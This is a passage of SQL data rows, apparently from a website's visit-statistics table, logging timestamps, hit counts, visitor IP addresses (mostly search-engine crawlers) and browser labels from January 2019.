373215,1547855336,1,1,0,0,'54.36.149.27','other'),(373216,1547855347,1,1,0,0,'66.249.75.20','chrome'),(373217,1547855399,1,1,0,0,'95.163.255.108','other'),(373218,1547855701,1,1,0,0,'207.46.13.145','other'),(373219,1547855894,1,1,0,0,'46.229.168.150','other'),(373220,1547855895,1,1,0,0,'46.229.168.147','other'),(373221,1547856116,1,1,0,0,'207.46.13.147','other'),(373222,1547856393,1,1,0,0,'54.36.149.58','other'),(373223,1547856445,1,1,0,0,'54.36.148.126','other'),(373224,1547856494,14,14,0,0,'216.244.66.241','other'),(373225,1547856527,1,1,0,0,'95.163.255.185','other'),(373226,1547857800,1,1,0,0,'216.244.66.241','other'),(373227,1547858016,1,1,0,0,'66.249.75.17','chrome'),(373229,1547858038,1,1,0,0,'66.249.75.21','chrome'),(373230,1547858156,1,1,0,0,'46.229.168.140','other'),(373231,1547858158,1,1,0,0,'46.229.168.139','other'),(373232,1547858361,1,1,0,0,'54.36.148.212','other'),(373233,1547858599,1,1,0,0,'66.249.69.219','chrome'),(373234,1547858600,1,1,0,0,'66.249.69.204','chrome'),(373235,1547858605,1,1,0,0,'54.36.149.78','other'),(373236,1547859250,8,8,0,0,'216.244.66.241','other'),(373237,1547859282,2,2,0,0,'66.249.75.16','chrome'),(373238,1547859283,2,2,0,0,'66.249.75.20','chrome'),(373239,1547859315,1,1,0,0,'109.70.100.19','other'),(373240,1547859317,1,1,0,0,'213.180.203.9','other'),(373241,1547859348,1,1,0,0,'54.36.148.38','other'),(373242,1547859483,2,2,0,0,'178.154.244.11','other'),(373243,1547859530,1,1,0,0,'5.45.207.79','other'),(373244,1547859700,1,1,0,0,'66.249.75.17','chrome'),(373245,1547859701,1,1,0,0,'66.249.75.22','chrome'),(373246,1547859775,1,1,0,0,'66.249.69.204','chrome'),(373247,1547859795,5,5,0,0,'5.45.207.19','other'),(373248,1547860027,1,1,0,0,'40.77.167.111','other'),(373249,1547860122,1,1,0,0,'141.8.142.103','other'),(373250,1547860169,6,6,0,0,'216.244.66.241','other'),(373251,1547860262,1,1,0,0,'95.108.213.4','other'),(373252,1547860845,2,2,0,0,'207.46.13.155','other'),(373253,1547860924,1,1,0,0,'80.252.153.33','firefox'),(373254,1547860978,1,1,0,0,'5.45.207.19','other'),(373255,1547861090,2,2,0,0,'178.154.244.11','other'),(373256,1547861419,1,1,0,0,'54.36.149.86','other'),(373257,1547861739,1,1,0,0,'95.163.255.115','other'),(373258,1547861767,1,1,0,0,'157.55.39.88','other'),(373259,1547861845,1,1,0,0,'95.163.255.117','other'),(373260,1547862025,5,5,0,0,'216.244.66.241','other'),(373261,1547862124,1,1,0,0,'66.249.75.16','chrome'),(373263,1547862157,1,1,0,0,'8.29.198.26','other'),(373264,1547862329,1,1,0,0,'178.154.244.11','other'),(373265,1547862792,1,1,0,0,'54.36.148.225','other'),(373266,1547862831,1,1,0,0,'157.55.39.91','other'),(373267,1547862955,4,4,0,0,'216.244.66.241','other'),(373268,1547863511,2,2,0,0,'207.46.13.185','other'),(373269,1547863565,1,1,0,0,'8.29.198.27','other'),(373270,1547863579,1,1,0,0,'54.36.148.193','other'),(373271,1547863739,1,1,0,0,'66.249.69.202','chrome'),(373272,1547863811,1,1,0,0,'66.249.69.204','chrome'),(373273,1547864076,1,1,0,0,'157.55.39.91','other'),(373274,1547864668,2,2,0,0,'66.249.75.21','chrome'),(373275,1547864700,1,1,0,0,'54.36.149.38','other'),(373276,1547864782,4,4,0,0,'216.244.66.241','other'),(373277,1547864858,1,1,0,0,'54.36.149.101','other'),(373278,1547865003,1,1,0,0,'66.249.75.20','chrome'),(373279,1547865262,1,1,0,0,'157.55.39.86','other'),(373280,1547865478,1,1,0,0,'54.36.148.116','other'),(373281,1547865628,1,1,0,0,'54.36.148.73','other'),(373282,1547866143,1,1,0,0,'66.249.75.142','chrome'),(373283,1547866510,3,3,0,0,'207.46.13.220','other'),(373284,1547866653,5,5,0,0,'216.244.66.241','other'),(373285,1547867621,9,9,0,0,'216.244.66.241','other'),(373286,1547867828,1,1,0,0,'54.36.148.214','other'),(373287,1547868120,1,1,0,0,'54.36.149.51','other'),(373288,1547868386,1,1,0,0,'54.36.148.81','other'),(373289,1547868457,1,1,0,0,'207.46.13.220','other'),(373290,1547868637,1,1,0,0,'54.36.149.15','other'),(373291,1547868669,2,2,0,0,'216.244.66.241','other'),(373292,1547868816,2,2,0,0,'66.249.75.22','chrome'),(373293,1547868922,1,1,0,0,'54.36.149.10','other'),(373294,1547869063,2,2,0,0,'157.55.39.91','other'),(373295,1547869066,3,3,0,0,'5.45.207.19','other'),(373296,1547869268,1,1,0,0,'54.36.148.93','other'),(373297,1547869537,1,1,0,0,'54.36.148.29','other'),(373298,1547869601,3,3,0,0,'141.8.142.103','other'),(373299,1547869779,2,2,0,0,'207.46.13.185','other'),(373300,1547869900,4,4,0,0,'178.154.244.11','other'),(373301,1547869904,1,1,0,0,'87.250.224.47','other'),(373302,1547869907,1,1,0,0,'95.108.213.4','other'),(373303,1547869911,6,6,0,0,'5.45.207.79','other'),(373304,1547869981,6,6,0,0,'5.45.207.19','other'),(373305,1547870009,1,1,0,0,'54.36.148.39','other'),(373306,1547870268,1,1,0,0,'46.211.48.23','chrome'),(373307,1547870311,10,10,0,0,'216.244.66.241','other'),(373308,1547870358,1,1,0,0,'54.36.148.84','other'),(373309,1547870475,1,1,0,0,'37.9.113.103','other'),(373310,1547870696,1,1,0,0,'66.249.75.21','chrome'),(373311,1547870879,1,1,0,0,'5.45.207.79','other'),(373312,1547870960,2,2,0,0,'178.154.244.11','other'),(373313,1547871093,1,1,0,0,'5.45.207.19','other'),(373314,1547871135,1,1,0,0,'141.8.142.103','other'),(373315,1547871447,1,1,0,0,'216.244.66.241','other'),(373316,1547871789,1,1,0,0,'54.36.148.85','other'),(373317,1547871846,1,1,0,0,'54.36.148.39','other'),(373318,1547871929,1,1,0,0,'66.249.75.15','chrome'),(373320,1547872121,1,1,0,0,'54.36.148.210','other'),(373321,1547872220,1,1,0,0,'54.36.148.194','other'),(373322,1547872221,1,1,0,0,'54.36.148.172','other'),(373323,1547872254,1,1,0,0,'66.249.75.142','chrome'),(373324,1547872409,210,210,0,0,'107.150.59.98','other'),(373325,1547872414,1,1,0,0,'54.36.149.71','other'),(373326,1547872450,1,1,0,0,'66.249.75.144','chrome'),(373327,1547872735,1,1,0,0,'54.36.148.219','other'),(373328,1547872996,1,1,0,0,'8.29.198.25','other'),(373329,1547873086,14,14,0,0,'216.244.66.241','other'),(373330,1547873311,25,25,0,0,'107.150.59.98','other'),(373331,1547873682,1,1,0,0,'66.249.75.16','chrome'),(373332,1547873683,2,2,0,0,'66.249.75.22','chrome'),(373333,1547873862,2,2,0,0,'95.213.141.126','opera'),(373334,1547874046,1,1,0,0,'216.244.66.241','other'),(373335,1547874412,1,1,0,0,'8.29.198.27','other'),(373336,1547874591,1,1,0,0,'157.55.39.53','other'),(373337,1547874615,3,3,0,0,'157.55.39.186','other'),(373338,1547874656,2,2,0,0,'66.249.75.142','chrome'),(373339,1547874731,1,1,0,0,'54.36.148.87','other'),(373340,1547875134,2,2,0,0,'66.249.75.153','chrome'),(373341,1547875260,1,1,0,0,'157.55.39.236','other'),(373342,1547875388,1,1,0,0,'54.36.149.32','other'),(373343,1547875685,2,2,0,0,'66.249.75.142','chrome'),(373344,1547875823,6,6,0,0,'216.244.66.241','other'),(373345,1547875826,1,1,0,0,'180.76.15.20','other'),(373346,1547875827,1,1,0,0,'180.76.15.142','other'),(373347,1547876228,1,1,0,0,'66.249.75.20','chrome'),(373348,1547876372,1,1,0,0,'157.55.39.186','other'),(373349,1547876454,1,1,0,0,'54.36.148.81','other'),(373350,1547876645,1,1,0,0,'157.55.39.236','other'),(373351,1547876891,1,1,0,0,'54.36.148.101','other'),(373352,1547877090,1,1,0,0,'66.249.75.157','chrome'),(373353,1547877091,1,1,0,0,'66.249.75.142','chrome'),(373354,1547877147,1,1,0,0,'54.36.149.58','other'),(373355,1547877343,1,1,0,0,'157.55.39.53','other'),(373356,1547877556,1,1,0,0,'216.244.66.241','other'),(373357,1547877827,2,2,0,0,'95.142.161.63','other'),(373358,1547878495,1,1,0,0,'40.77.167.1','other'),(373359,1547878555,1,1,0,0,'54.36.149.101','other'),(373360,1547878585,12,12,0,0,'216.244.66.241','other'),(373361,1547878676,1,1,0,0,'157.55.39.236','other'),(373362,1547878720,30,30,0,0,'95.216.19.117','other'),(373363,1547879277,2,2,0,0,'52.53.201.78','chrome'),(373364,1547879381,2,2,0,0,'66.249.75.21','chrome'),(373365,1547879468,1,1,0,0,'66.249.75.17','chrome'),(373366,1547879633,1,1,0,0,'157.55.39.186','other'),(373367,1547879758,1,1,0,0,'54.36.149.73','other'),(373368,1547879799,1,1,0,0,'54.36.148.152','other'),(373369,1547879899,1,1,0,0,'54.36.149.60','other'),(373370,1547880219,1,1,0,0,'216.244.66.241','other'),(373371,1547880225,1,1,0,0,'54.36.148.200','other'),(373372,1547880474,1,1,0,0,'54.36.148.103','other'),(373373,1547880575,1,1,0,0,'5.45.207.79','other'),(373374,1547880622,1,1,0,0,'54.36.148.40','other'),(373375,1547880707,1,1,0,0,'54.36.148.28','other'),(373376,1547880785,1,1,0,0,'213.180.203.17','other'),(373377,1547880847,1,1,0,0,'95.108.213.50','other'),(373378,1547880898,2,2,0,0,'141.8.183.22','other'),(373379,1547880933,1,1,0,0,'5.255.253.38','other'),(373380,1547880958,1,1,0,0,'178.154.200.48','other'),(373381,1547880968,3,3,0,0,'141.8.142.38','other'),(373382,1547880971,1,1,0,0,'178.154.244.49','other'),(373383,1547880974,1,1,0,0,'141.8.142.81','other'),(373384,1547880979,2,2,0,0,'178.154.244.11','other'),(373385,1547881038,1,1,0,0,'178.154.244.65','other'),(373386,1547881110,2,2,0,0,'5.45.207.19','other'),(373387,1547881162,1,1,0,0,'95.108.213.4','other'),(373388,1547881165,1,1,0,0,'87.250.224.65','other'),(373389,1547881168,1,1,0,0,'178.154.171.24','other'),(373390,1547881230,1,1,0,0,'87.250.224.47','other'),(373391,1547881234,1,1,0,0,'87.250.224.118','other'),(373392,1547881292,1,1,0,0,'66.249.69.144','chrome'),(373393,1547881336,2,2,0,0,'141.8.142.103','other'),(373394,1547881386,5,5,0,0,'216.244.66.241','other'),(373395,1547881515,1,1,0,0,'213.180.203.40','other'),(373396,1547881771,1,1,0,0,'66.249.75.142','chrome'),(373397,1547881792,3,3,0,0,'5.45.207.79','other'),(373398,1547882092,2,2,0,0,'178.154.244.11','other'),(373399,1547882116,3,3,0,0,'5.45.207.19','other'),(373400,1547882198,1,1,0,0,'157.55.39.186','other'),(373401,1547882589,1,1,0,0,'87.250.224.47','other'),(373402,1547882602,1,1,0,0,'216.244.66.241','other'),(373403,1547883345,1,1,0,0,'66.249.75.144','chrome'),(373404,1547883764,1,1,0,0,'54.36.149.91','other'),(373405,1547883830,1,1,0,0,'54.36.149.64','other'),(373406,1547883832,1,1,0,0,'8.29.198.26','other'),(373407,1547883886,1,1,0,0,'54.36.149.15','other'),(373408,1547883911,1,1,0,0,'54.36.148.165','other'),(373409,1547884170,8,8,0,0,'216.244.66.241','other'),(373410,1547884482,1,1,0,0,'180.76.15.159','other'),(373411,1547884620,1,1,0,0,'13.57.233.99','chrome'),(373412,1547884631,1,1,0,0,'66.249.75.140','chrome'),(373413,1547884677,1,1,0,0,'66.249.69.148','chrome'),(373414,1547884855,1,1,0,0,'91.196.178.93','chrome'),(373415,1547885122,1,1,0,0,'54.36.149.104','other'),(373416,1547885170,3,3,0,0,'216.244.66.241','other'),(373417,1547885256,1,1,0,0,'8.29.198.25','other'),(373418,1547885566,1,1,0,0,'54.36.148.219','other'),(373419,1547885582,1,1,0,0,'54.36.149.4','other'),(373420,1547885816,1,1,0,0,'46.229.168.144','other'),(373421,1547885819,2,2,0,0,'40.77.167.181','other'),(373422,1547885877,1,1,0,0,'66.249.69.150','chrome'),(373423,1547886171,1,1,0,0,'46.229.168.142','other'),(373424,1547886215,1,1,0,0,'46.229.168.138','other'),(373425,1547886219,1,1,0,0,'54.36.148.139','other'),(373426,1547886683,1,1,0,0,'46.229.168.148','other'),(373427,1547886733,1,1,0,0,'54.36.148.174','other'),(373428,1547886916,11,11,0,0,'216.244.66.241','other'),(373429,1547887569,1,1,0,0,'66.102.9.35','chrome'),(373430,1547887570,1,1,0,0,'66.102.9.62','chrome'),(373431,1547887985,1,1,0,0,'54.36.148.128','other'),(373432,1547888029,5,5,0,0,'216.244.66.241','other'),(373433,1547888248,1,1,0,0,'51.15.21.189','other'),(373434,1547888377,1,1,0,0,'54.36.149.100','other'),(373435,1547888914,1,1,0,0,'207.46.13.202','other'),(373436,1547889386,1,1,0,0,'66.249.69.150','chrome'),(373437,1547889499,1,1,0,0,'95.163.255.93','other'),(373438,1547889514,1,1,0,0,'54.36.148.166','other'),(373439,1547889640,1,1,0,0,'54.36.148.37','other'),(373440,1547889680,1,1,0,0,'78.111.186.195','chrome'),(373441,1547889721,13,13,0,0,'216.244.66.241','other'),(373442,1547889738,1,1,0,0,'46.229.168.136','other'),(373443,1547890517,1,1,0,0,'66.249.69.150','chrome'),(373444,1547890609,1,1,0,0,'66.249.75.140','chrome'),(373445,1547890765,3,3,0,0,'216.244.66.241','other'),(373446,1547890926,1,1,0,0,'54.36.148.235','other'),(373447,1547891149,1,1,0,0,'46.229.168.146','other'),(373448,1547891321,1,1,0,0,'54.36.148.29','other'),(373449,1547891324,1,1,0,0,'54.36.148.57','other'),(373450,1547891671,1,1,0,0,'46.229.168.151','other'),(373451,1547891672,1,1,0,0,'46.229.168.150','other'),(373452,1547891676,1,1,0,0,'207.46.13.75','other'),(373453,1547891692,1,1,0,0,'46.229.168.154','other'),(373454,1547891849,1,1,0,0,'54.36.148.119','other'),(373455,1547891969,1,1,0,0,'184.175.34.239','other'),(373456,1547891971,1,1,0,0,'184.175.34.239','firefox'),(373457,1547892494,12,12,0,0,'216.244.66.241','other'),(373458,1547892583,1,1,0,0,'66.249.69.148','chrome'),(373459,1547892590,1,1,0,0,'66.249.69.143','chrome'),(373460,1547892738,2,2,0,0,'5.45.207.19','other'),(373461,1547892912,1,1,0,0,'40.77.167.81','other'),(373462,1547893072,1,1,0,0,'5.45.207.79','other'),(373463,1547893467,1,1,0,0,'216.244.66.241','other'),(373464,1547893706,2,2,0,0,'37.9.113.148','other'),(373465,1547893709,1,1,0,0,'54.36.148.130','other'),(373466,1547893780,1,1,0,0,'46.229.168.146','other'),(373467,1547893821,6,6,0,0,'66.249.69.150','chrome'),(373468,1547893971,1,1,0,0,'54.36.149.87','other'),(373469,1547893982,11,11,0,0,'66.249.69.149','chrome'),(373470,1547894014,1,1,0,0,'54.36.148.231','other'),(373471,1547894041,1,1,0,0,'207.46.13.75','other'),(373472,1547894195,2,2,0,0,'66.249.69.143','chrome'),(373473,1547894200,42,42,0,0,'66.249.69.148','chrome'),(373474,1547894271,3,3,0,0,'5.45.207.19','other'),(373475,1547894305,1,1,0,0,'141.8.142.103','other'),(373476,1547894338,1,1,0,0,'54.36.148.93','other'),(373477,1547894347,1,1,0,0,'54.36.148.15','other'),(373478,1547894380,1,1,0,0,'40.77.167.81','other'),(373479,1547894596,1,1,0,0,'5.45.207.79','other'),(373480,1547894660,1,1,0,0,'8.29.198.27','other'),(373481,1547894663,1,1,0,0,'54.36.148.216','other'),(373482,1547894760,1,1,0,0,'54.36.148.135','other'),(373483,1547894848,1,1,0,0,'54.36.148.35','other'),(373484,1547895033,3,3,0,0,'66.249.69.150','chrome'),(373485,1547895169,1,1,0,0,'54.36.149.28','other'),(373486,1547895189,1,1,0,0,'66.249.69.143','chrome'),(373487,1547895193,3,3,0,0,'66.249.69.148','chrome'),(373488,1547895281,8,8,0,0,'216.244.66.241','other'),(373489,1547895682,4,4,0,0,'66.249.69.149','chrome'),(373490,1547895758,1,1,0,0,'54.36.148.121','other'),(373491,1547895853,1,1,0,0,'207.46.13.75','other'),(373492,1547896100,1,1,0,0,'8.29.198.27','other'),(373493,1547896235,1,1,0,0,'66.249.69.148','chrome'),(373494,1547896396,1,1,0,0,'66.249.75.140','chrome'),(373495,1547896449,1,1,0,0,'216.244.66.241','other'),(373496,1547896516,1,1,0,0,'54.36.149.77','other'),(373497,1547896617,2,2,0,0,'46.229.168.137','other'),(373498,1547896703,2,2,0,0,'66.249.69.150','chrome'),(373499,1547897005,1,1,0,0,'54.36.148.27','other'),(373500,1547897147,1,1,0,0,'54.36.148.49','other'),(373501,1547897182,1,1,0,0,'54.36.149.78','other'),(373502,1547897432,1,1,0,0,'66.249.69.148','chrome'),(373503,1547897526,1,1,0,0,'54.36.148.206','other'),(373504,1547897573,1,1,0,0,'54.36.148.185','other'),(373505,1547897833,5,5,0,0,'5.9.156.20','other'),(373506,1547897995,1,1,0,0,'54.36.148.88','other'),(373507,1547898084,7,7,0,0,'216.244.66.241','other'),(373508,1547898304,1,1,0,0,'66.249.75.22','chrome'),(373509,1547898327,2,2,0,0,'66.249.75.142','chrome'),(373510,1547898386,1,1,0,0,'40.77.167.33','other'),(373511,1547898546,1,1,0,0,'54.36.149.42','other'),(373512,1547898733,1,1,0,0,'188.32.50.41','msie'),(373513,1547899013,1,1,0,0,'54.36.148.92','other'),(373514,1547899070,2,2,0,0,'66.249.75.20','chrome'),(373515,1547899269,1,1,0,0,'54.36.148.76','other'),(373516,1547899320,1,1,0,0,'66.249.75.22','chrome'),(373517,1547899458,1,1,0,0,'66.249.75.17','chrome'),(373518,1547899479,1,1,0,0,'54.36.149.66','other'),(373519,1547899687,2,2,0,0,'216.244.66.241','other'),(373520,1547899978,1,1,0,0,'54.36.148.17','other'),(373521,1547900300,2,2,0,0,'66.249.75.20','chrome'),(373522,1547900510,1,1,0,0,'46.229.168.144','other'),(373523,1547900667,2,2,0,0,'66.249.75.16','chrome'),(373524,1547900670,2,2,0,0,'66.249.75.22','chrome'),(373525,1547900693,1,1,0,0,'54.36.148.75','other'),(373526,1547900861,10,10,0,0,'216.244.66.241','other'),(373527,1547901002,1,1,0,0,'54.36.148.183','other'),(373528,1547901163,1,1,0,0,'40.77.167.33','other'),(373529,1547901940,1,1,0,0,'66.249.75.20','chrome'),(373530,1547901959,1,1,0,0,'46.229.168.138','other'),(373531,1547901963,1,1,0,0,'54.36.148.144','other'),(373532,1547902169,1,1,0,0,'46.229.168.150','other'),(373533,1547902228,1,1,0,0,'40.77.167.181','other'),(373534,1547902632,1,1,0,0,'216.244.66.241','other'),(373535,1547902685,1,1,0,0,'54.36.148.180','other'),(373536,1547902698,1,1,0,0,'141.8.183.23','other'),(373537,1547903383,1,1,0,0,'66.249.75.21','chrome'),(373538,1547903721,1,1,0,0,'54.36.149.32','other'),(373539,1547903762,1,1,0,0,'207.46.13.75','other'),(373540,1547903817,7,7,0,0,'216.244.66.241','other'),(373541,1547904196,1,1,0,0,'54.36.148.66','other'),(373542,1547904498,1,1,0,0,'66.249.75.22','chrome'),(373543,1547904713,2,2,0,0,'141.8.142.103','other'),(373544,1547904725,1,1,0,0,'46.229.168.150','other'),(373545,1547904834,1,1,0,0,'178.154.171.27','other'),(373546,1547904838,2,2,0,0,'178.154.200.48','other'),(373547,1547905077,1,1,0,0,'66.249.75.153','chrome'),(373549,1547905206,1,1,0,0,'37.9.113.20','other'),(373550,1547905284,1,1,0,0,'46.229.168.137','other'),(373551,1547905373,2,2,0,0,'5.255.253.38','other'),(373552,1547905494,1,1,0,0,'8.29.198.25','other'),(373553,1547905935,1,1,0,0,'54.36.148.186','other'),(373554,1547906118,1,1,0,0,'87.250.224.64','other'),(373555,1547906237,1,1,0,0,'178.154.200.48','other'),(373556,1547906240,1,1,0,0,'37.9.113.38','other'),(373557,1547906252,1,1,0,0,'141.8.142.144','other'),(373558,1547906404,20,20,0,0,'216.244.66.241','other'),(373559,1547906512,1,1,0,0,'66.249.75.144','chrome'),(373560,1547906596,1,1,0,0,'66.249.75.20','chrome'),(373561,1547906924,2,2,0,0,'157.55.39.88','other'),(373562,1547906947,1,1,0,0,'8.29.198.26','other'),(373563,1547907318,1,1,0,0,'66.249.75.16','chrome'),(373565,1547907422,1,1,0,0,'54.36.148.165','other'),(373566,1547907646,1,1,0,0,'54.36.148.17','other'),(373567,1547907765,1,1,0,0,'66.249.75.17','chrome'),(373568,1547907766,1,1,0,0,'66.249.75.22','chrome'),(373569,1547907882,1,1,0,0,'54.36.148.209','other'),(373570,1547908141,1,1,0,0,'216.244.66.241','other'),(373571,1547908282,1,1,0,0,'66.249.75.20','chrome'),(373572,1547908594,1,1,0,0,'46.229.168.144','other'),(373573,1547908624,1,1,0,0,'66.249.75.21','chrome'),(373574,1547908823,1,1,0,0,'46.229.168.150','other'),(373575,1547908825,1,1,0,0,'46.229.168.139','other'),(373576,1547908906,2,2,0,0,'46.211.26.117','chrome'),(373577,1547908932,1,1,0,0,'54.36.148.176','other'),(373578,1547909141,1,1,0,0,'66.249.75.144','chrome'),(373579,1547909177,6,6,0,0,'216.244.66.241','other'),(373580,1547909705,1,1,0,0,'66.249.75.16','chrome'),(373581,1547909706,1,1,0,0,'66.249.75.22','chrome'),(373582,1547910103,1,1,0,0,'46.229.168.129','other'),(373583,1547910418,2,2,0,0,'216.244.66.241','other'),(373584,1547910979,2,2,0,0,'144.76.96.236','other'),(373585,1547911117,1,1,0,0,'13.66.139.0','other'),(373586,1547911437,1,1,0,0,'54.36.148.49','other'),(373587,1547911560,1,1,0,0,'141.8.132.16','other'),(373588,1547911915,1,1,0,0,'95.163.255.98','other'),(373589,1547911918,1,1,0,0,'95.163.255.97','other'),(373590,1547911947,9,9,0,0,'216.244.66.241','other'),(373591,1547912313,1,1,0,0,'37.9.113.148','other'),(373592,1547912805,1,1,0,0,'141.8.183.23','other'),(373593,1547912885,5,5,0,0,'216.244.66.241','other'),(373594,1547913569,2,2,0,0,'66.249.75.22','chrome'),(373595,1547913620,1,1,0,0,'46.229.168.146','other'),(373596,1547913933,2,2,0,0,'66.249.75.20','chrome'),(373597,1547914054,1,1,0,0,'54.36.148.253','other'),(373598,1547914153,1,1,0,0,'66.249.75.17','chrome'),(373599,1547914712,7,7,0,0,'216.244.66.241','other'),(373600,1547914750,1,1,0,0,'46.229.168.148','other'),(373601,1547914752,1,1,0,0,'46.229.168.146','other'),(373602,1547914797,1,1,0,0,'54.36.148.242','other'),(373603,1547915031,1,1,0,0,'54.36.148.54','other'),(373604,1547915240,1,1,0,0,'66.249.75.21','chrome'),(373605,1547915300,2,2,0,0,'66.249.75.15','chrome'),(373606,1547915302,3,3,0,0,'66.249.75.20','chrome'),(373607,1547915893,1,1,0,0,'66.249.75.140','chrome'),(373608,1547915900,1,1,0,0,'66.249.75.142','chrome'),(373609,1547915951,1,1,0,0,'213.180.203.17','other'),(373610,1547916000,4,4,0,0,'216.244.66.241','other'),(373611,1547916008,2,2,0,0,'207.46.13.171','other'),(373612,1547916132,1,1,0,0,'54.36.149.98','other'),(373613,1547916304,1,1,0,0,'178.154.171.24','other'),(373614,1547916330,1,1,0,0,'8.29.198.27','other'),(373615,1547916373,1,1,0,0,'54.36.148.142','other'),(373616,1547916622,1,1,0,0,'141.8.132.16','other'),(373617,1547916704,1,1,0,0,'87.250.224.64','other'),(373618,1547916903,1,1,0,0,'66.249.75.22','chrome'),(373619,1547916948,1,1,0,0,'66.249.75.140','chrome'),(373620,1547917117,1,1,0,0,'37.9.113.148','other'),(373621,1547917238,1,1,0,0,'54.36.148.101','other'),(373622,1547917394,1,1,0,0,'54.36.148.189','other'),(373623,1547917484,6,6,0,0,'216.244.66.241','other'),(373624,1547917715,1,1,0,0,'40.77.167.181','other'),(373625,1547917810,1,1,0,0,'8.29.198.25','other'),(373626,1547918227,1,1,0,0,'54.36.149.22','other'),(373627,1547918377,1,1,0,0,'13.66.139.0','other'),(373628,1547918434,5,5,0,0,'216.244.66.241','other'),(373629,1547918754,1,1,0,0,'40.77.167.19','other'),(373630,1547918808,1,1,0,0,'54.36.149.61','other'),(373631,1547919758,1,1,0,0,'54.36.149.85','other'),(373632,1547919781,1,1,0,0,'207.46.13.181','other'),(373633,1547920241,7,7,0,0,'216.244.66.241','other'),(373634,1547920672,1,1,0,0,'54.36.148.234','other'),(373635,1547920776,2,2,0,0,'207.46.13.181','other'),(373636,1547920994,1,1,0,0,'54.36.149.6','other'),(373637,1547921112,2,2,0,0,'66.249.75.20','chrome'),(373638,1547921196,6,6,0,0,'216.244.66.241','other'),(373639,1547921246,1,1,0,0,'54.36.148.151','other'),(373640,1547921285,1,1,0,0,'66.249.75.17','chrome'),(373641,1547921553,1,1,0,0,'54.36.149.68','other'),(373642,1547922118,4,4,0,0,'216.244.66.241','other'),(373643,1547922239,1,1,0,0,'46.229.168.140','other'),(373644,1547922241,1,1,0,0,'46.229.168.154','other'),(373645,1547922515,2,2,0,0,'66.249.75.20','chrome'),(373646,1547922576,1,1,0,0,'66.249.75.142','chrome'),(373647,1547923248,13,13,0,0,'216.244.66.241','other'),(373649,1547923318,1,1,0,0,'54.36.148.126','other'),(373650,1547923487,1,1,0,0,'54.36.149.79','other'),(373651,1547923567,1,1,0,0,'207.46.13.181','other'),(373652,1547924285,2,2,0,0,'66.249.75.22','chrome'),(373653,1547924287,3,3,0,0,'216.244.66.241','other'),(373654,1547924546,1,1,0,0,'66.249.75.142','chrome'),(373655,1547924910,1,1,0,0,'54.36.148.171','other'),(373656,1547925117,2,2,0,0,'46.229.168.136','other'),(373657,1547925566,1,1,0,0,'54.36.149.103','other'),(373658,1547925579,1,1,0,0,'207.46.13.181','other'),(373659,1547925691,1,1,0,0,'46.211.148.244','chrome'),(373660,1547925797,7,7,0,0,'216.244.66.241','other'),(373661,1547925827,1,1,0,0,'54.36.148.157','other'),(373662,1547926244,1,1,0,0,'178.154.171.30','other'),(373663,1547926312,1,1,0,0,'87.250.224.47','other'),(373664,1547926493,1,1,0,0,'95.108.213.50','other'),(373665,1547926686,1,1,0,0,'54.36.149.54','other'),(373666,1547926688,1,1,0,0,'213.180.203.17','other'),(373667,1547926740,1,1,0,0,'54.36.148.217','other'),(373668,1547926774,1,1,0,0,'141.8.132.16','other'),(373669,1547926845,4,4,0,0,'216.244.66.241','other'),(373670,1547926860,2,2,0,0,'141.8.183.23','other'),(373671,1547926911,1,1,0,0,'207.46.13.222','other'),(373672,1547926938,1,1,0,0,'95.108.181.54','other'),(373673,1547926998,1,1,0,0,'5.45.207.79','other'),(373674,1547927024,1,1,0,0,'141.8.142.38','other'),(373675,1547927036,1,1,0,0,'141.8.142.191','other'),(373676,1547927144,1,1,0,0,'54.36.149.103','other'),(373677,1547927166,1,1,0,0,'8.29.198.26','other'),(373678,1547927595,1,1,0,0,'5.255.253.25','other'),(373679,1547927601,1,1,0,0,'87.250.224.118','other'),(373680,1547927606,1,1,0,0,'178.154.244.11','other'),(373681,1547927673,1,1,0,0,'213.180.203.53','other'),(373682,1547927730,1,1,0,0,'37.9.113.20','other'),(373683,1547927744,1,1,0,0,'66.249.75.16','chrome'),(373684,1547927746,2,2,0,0,'66.249.75.21','chrome'),(373685,1547927862,1,1,0,0,'95.108.181.75','other'),(373686,1547927864,1,1,0,0,'178.154.171.27','other'),(373687,1547927874,1,1,0,0,'46.229.168.135','other'),(373688,1547927881,2,2,0,0,'141.8.183.22','other'),(373689,1547927945,1,1,0,0,'95.108.181.54','other'),(373690,1547927951,1,1,0,0,'54.36.148.154','other'),(373691,1547927976,1,1,0,0,'207.46.13.99','other'),(373692,1547928069,1,1,0,0,'141.8.132.16','other'),(373693,1547928437,1,1,0,0,'54.36.148.48','other'),(373694,1547928514,1,1,0,0,'66.249.75.17','chrome'),(373695,1547928560,1,1,0,0,'66.249.75.22','chrome'),(373696,1547928566,5,5,0,0,'216.244.66.241','other'),(373697,1547928645,1,1,0,0,'8.29.198.26','other'),(373698,1547928792,1,1,0,0,'46.229.168.143','other'),(373699,1547929064,1,1,0,0,'54.36.149.57','other'),(373700,1547929186,1,1,0,0,'54.36.148.210','other'),(373701,1547929669,7,7,0,0,'216.244.66.241','other'),(373702,1547929748,1,1,0,0,'66.249.75.155','chrome'),(373703,1547929753,1,1,0,0,'66.249.75.22','chrome'),(373704,1547929763,1,1,0,0,'66.249.75.140','chrome'),(373705,1547929844,1,1,0,0,'54.36.148.109','other'),(373706,1547929964,1,1,0,0,'207.46.13.181','other'),(373707,1547930012,1,1,0,0,'141.8.183.22','other'),(373708,1547930388,1,1,0,0,'13.66.139.0','other'),(373709,1547930544,1,1,0,0,'54.36.149.74','other'),(373710,1547930576,1,1,0,0,'46.229.168.133','other'),(373711,1547930828,1,1,0,0,'66.249.75.140','chrome'),(373712,1547930860,1,1,0,0,'54.36.148.38','other'),(373713,1547930920,1,1,0,0,'54.36.148.176','other'),(373714,1547931353,1,1,0,0,'46.229.168.138','other'),(373715,1547931370,1,1,0,0,'95.163.255.96','other'),(373716,1547931373,1,1,0,0,'95.163.255.99','other'),(373717,1547931435,11,11,0,0,'216.244.66.241','other'),(373718,1547931461,1,1,0,0,'54.36.149.88','other'),(373719,1547931467,1,1,0,0,'46.229.168.132','other'),(373720,1547932096,1,1,0,0,'66.249.75.17','chrome'),(373721,1547932223,1,1,0,0,'40.77.167.181','other'),(373722,1547932448,2,2,0,0,'216.244.66.241','other'),(373723,1547932651,1,1,0,0,'95.163.255.116','other'),(373724,1547932709,1,1,0,0,'54.36.149.57','other'),(373725,1547932719,1,1,0,0,'46.229.168.137','other'),(373726,1547932820,1,1,0,0,'54.36.149.64','other'),(373727,1547932909,1,1,0,0,'54.36.149.5','other'),(373728,1547933264,1,1,0,0,'54.36.148.117','other'),(373729,1547934058,1,1,0,0,'207.46.13.171','other'),(373730,1547934122,11,11,0